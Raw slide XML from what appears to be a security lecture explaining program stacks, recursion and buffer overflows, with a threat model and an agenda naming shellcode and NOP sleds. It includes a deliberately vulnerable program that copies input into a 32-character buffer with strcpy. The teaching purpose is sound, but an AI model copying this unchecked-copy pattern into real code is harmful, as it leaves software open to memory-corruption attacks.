          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8779274" y="962220"/>
            <a:ext cx="2504140" cy="40246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argv</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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58FE83-725B-4D37-ABD4-021E0287CD35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8779274" y="1414403"/>
            <a:ext cx="2504140" cy="40246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argc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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9961B74-24D7-40F6-9F89-D024A5D2804F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7987464" y="2940424"/>
            <a:ext cx="3295950" cy="753420"/>
            <a:chOff x="7987464" y="4970037"/>
            <a:chExt cx="3295950" cy="75342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88226CC-58DF-4A7F-BA11-36AF21EA00AD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8779274" y="5320995"/>
              <a:ext cx="2504140" cy="40246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n – 1 = 2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A001156-8D8D-4DD5-9C0F-2A4C3E5C60C3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7987464" y="4970037"/>
              <a:ext cx="646269" cy="753420"/>
              <a:chOff x="7943951" y="2220292"/>
              <a:chExt cx="646269" cy="753420"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="27" name="Left Bracket 26">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FADA7FCB-6917-4578-8649-A15085371812}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8399664" y="2220292"/>
                <a:ext cx="190556" cy="753420"/>
              </a:xfrm>
              <a:prstGeom prst="leftBracket">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="57150"/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BBB9F7A-3E34-4926-B407-BB1A4EBDC88D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="16200000">
                <a:off x="7860915" y="2371194"/>
                <a:ext cx="56618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/>
                  <a:t>r(3)</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grp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7858E695-1AE5-40A2-81C6-A27A3CD39782}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8779274" y="1892521"/>
            <a:ext cx="2504140" cy="40246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IP = …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6D269AD-0CA5-4D4D-863C-B05DAB3C6931}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8016604" y="1892522"/>
            <a:ext cx="3266810" cy="938195"/>
            <a:chOff x="8016604" y="2520050"/>
            <a:chExt cx="3266810" cy="93819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E1AEF61-2B46-4F3C-94FF-2BD8CB0AADCC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8779274" y="2985247"/>
              <a:ext cx="2504140" cy="40246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3</a:t>
              </a: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E8DB585E-751C-4FDD-9A5B-A85F7B19DE3D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8016604" y="2520050"/>
              <a:ext cx="594578" cy="938195"/>
              <a:chOff x="7973091" y="2319118"/>
              <a:chExt cx="594578" cy="457943"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11" name="Left Bracket 10">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D8D45CC-5A52-493C-AB99-F7C144AE0D7B}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8373201" y="2340774"/>
                <a:ext cx="194468" cy="401860"/>
              </a:xfrm>
              <a:prstGeom prst="leftBracket">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="57150"/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03EADBE-EC70-4A0C-8EB5-E410A92ACFC2}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="16200000">
                <a:off x="7944174" y="2348035"/>
                <a:ext cx="4579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main()</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grp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D7232182-2697-42C1-9E85-554810934078}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8779274" y="2830717"/>
            <a:ext cx="2504140" cy="40246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IP = 6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B53AD9D-CB21-479B-863E-A65ECE9B4596}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8016602" y="3807012"/>
            <a:ext cx="3282705" cy="803482"/>
            <a:chOff x="8000709" y="4919975"/>
            <a:chExt cx="3282705" cy="80348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BBAE19E-1B50-4022-A454-D9F62D0F2F1D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8779274" y="5320995"/>
              <a:ext cx="2504140" cy="40246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n – 1 = 1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F7EA8E1D-7E8C-4DDE-B54D-C7E40B35EB68}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8000709" y="4919975"/>
              <a:ext cx="617130" cy="803482"/>
              <a:chOff x="7957196" y="2170230"/>
              <a:chExt cx="617130" cy="803482"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="37" name="Left Bracket 36">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33A53BD1-05B8-473F-A9DC-D5587F96969D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8399664" y="2170230"/>
                <a:ext cx="174662" cy="803482"/>
              </a:xfrm>
              <a:prstGeom prst="leftBracket">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="57150"/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402D2D4-54EC-4F36-8515-D2EC551D1A4B}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="16200000">
                <a:off x="7874160" y="2333643"/>
                <a:ext cx="56618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/>
                  <a:t>r(2)</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grp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8757AD85-6A4F-412D-B087-9A36F8650B0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8795167" y="3747367"/>
            <a:ext cx="2504140" cy="40246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IP = 2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9F22182-62F8-4E0C-9547-10811DF920ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8017617" y="4723662"/>
            <a:ext cx="3282705" cy="808515"/>
            <a:chOff x="8000709" y="4914942"/>
            <a:chExt cx="3282705" cy="808515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09071BF9-C59E-4A40-B712-D106E2CF1DBD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8779274" y="5320995"/>
              <a:ext cx="2504140" cy="40246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n – 1 = 0</a:t>
              </a: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D2DD6C5D-5A5B-4B91-9D51-0CA3A854EA7A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8000709" y="4914942"/>
              <a:ext cx="630984" cy="808515"/>
              <a:chOff x="7957196" y="2165197"/>
              <a:chExt cx="630984" cy="808515"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="49" name="Left Bracket 48">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF5CDDFC-DFB2-47E0-9C1B-61E36F36E6F5}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8399663" y="2165197"/>
                <a:ext cx="188517" cy="808515"/>
              </a:xfrm>
              <a:prstGeom prst="leftBracket">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="57150"/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82AA1B3-C420-4152-A1B8-EE6B6DBD5494}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="16200000">
                <a:off x="7874160" y="2345591"/>
                <a:ext cx="56618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/>
                  <a:t>r(1)</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grp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B1AA273A-0EB8-49B6-AC8F-0783927E657B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8796182" y="4669050"/>
            <a:ext cx="2504140" cy="40246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IP = 2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D626280-318F-496D-9B80-114529B3D278}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8032486" y="5653825"/>
            <a:ext cx="3282705" cy="808515"/>
            <a:chOff x="8000709" y="4914942"/>
            <a:chExt cx="3282705" cy="808515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E135F6DE-A79A-44C0-9DF0-0A238FA2535B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8779274" y="5320995"/>
              <a:ext cx="2504140" cy="40246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0</a:t>
              </a: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FCA5E4F4-D1E9-4F6D-811A-2ADC0B5BA835}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8000709" y="4914942"/>
              <a:ext cx="638336" cy="808515"/>
              <a:chOff x="7957196" y="2165197"/>
              <a:chExt cx="638336" cy="808515"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="61" name="Left Bracket 60">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79E2A06B-19C1-4D60-ABE2-0A603BB8413C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8399663" y="2165197"/>
                <a:ext cx="195869" cy="808515"/>
              </a:xfrm>
              <a:prstGeom prst="leftBracket">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="57150"/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882F764-D423-4291-A0AB-DDC24011B906}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="16200000">
                <a:off x="7874160" y="2333634"/>
                <a:ext cx="56618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/>
                  <a:t>r(0)</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grp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C1BA0AED-0569-4AB8-B2CC-5C971D8668BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8811051" y="5599213"/>
            <a:ext cx="2504140" cy="40246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IP = 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="397957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9" grpId="0" animBg="1"/>
      <p:bldP spid="39" grpId="1" animBg="1"/>
      <p:bldP spid="51" grpId="0" animBg="1"/>
      <p:bldP spid="51" grpId="1" animBg="1"/>
      <p:bldP spid="63" grpId="0" animBg="1"/>
      <p:bldP spid="6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Request Format</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="HTTPrequest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718397" y="1604865"/>
            <a:ext cx="9432382" cy="474409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0775294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FCC9B-EF8F-4FA8-9205-222311216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9244F-97FA-4269-A153-622CDA239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4983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Running programs exist in memory (RAM)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Assembly code is in program memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CPU keeps track of current instruction in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> register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Data memory is structured as a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>frames</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Each function invocation adds a frame to the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Each frame contains</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Saved IP to return to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Local variables that are in scope</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42126423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77A9F-8EE6-4BC2-93E3-42A7E2FAC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 Fact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BEE34-B770-4D43-83B4-F5F0D3D70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is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stack overflow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/>
              <a:t>Memory is finite</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If recursion goes too deep, memory is exhausted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Program crashes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Called a stack overflow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="85192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C9CC24-B375-4226-BF2B-61FADBBA6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70A28E-4FD8-4474-A206-E15B5EBB3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084747"/>
            <a:ext cx="12188952" cy="3294207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9647E21-5366-4638-AC97-D8CD4111E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r="8214" b="45501"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="0" y="0"/>
            <a:ext cx="12191999" cy="4473360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8ECD8A6-945A-4663-9D24-7E0287644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925" y="2076450"/>
            <a:ext cx="10684151" cy="13451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Buffer Overflows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5C7ACE-9E25-428E-A99E-7CDF262FD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71575" y="4473360"/>
            <a:ext cx="9469211" cy="8656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00" kern="12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A Vulnerable Program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="700" kern="12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Smashing the Stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="700" kern="12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Shellcode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="700" kern="12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NOP Sleds</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="384158205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Corruption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Programs often contain bugs that corrupt stack memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Usually, this just causes a program crash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The infamous “segmentation” or “page” fault</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To an attacker, every bug is an opportunity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Try to modify program data in very specific ways</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vulnerability stems from two factors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Low-level languages are not memory-safe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Control flow information is stored inline with user data on the stack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50406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4500" dirty="0"/>
              <a:t>Threat </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4500" dirty="0"/>
              <a:t>Model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Attacker’s goal:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Inject malicious code into a program and execute it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Gain all privileges and capabilities of the target program (e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>setuid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System’s goal: prevent code injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Integrity – program should execute faithfully, as programmer intended</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Crashes should be handled gracefully</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacker’s capability: submit arbitrary input to the program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Environment variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Command line parameters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Contents of files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Network data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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05729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573" y="320675"/>
            <a:ext cx="11407487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Threat Model Assumptions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32B78-23DD-4E77-8B9C-7779E3BF2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DA0EB2D7-8315-4544-B6DA-6906E745C5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4817009"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="396574" y="1825625"/>
          <a:ext cx="1140748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799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B3FD1-40EA-432C-A286-A9B673140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433196" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A Vulnerable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B7E7A-4158-4A3A-9991-2A74F262C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105" y="1825625"/>
            <a:ext cx="5206895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void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> print(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string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> s) {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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// only holds 32 characters, max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string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> buffer[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>32</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>];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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(buffer, s);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puts(buffer);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18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void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"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main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(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integer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin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</a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, 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strings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin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</a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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print(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]);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2"/>
                </a:solidFill>
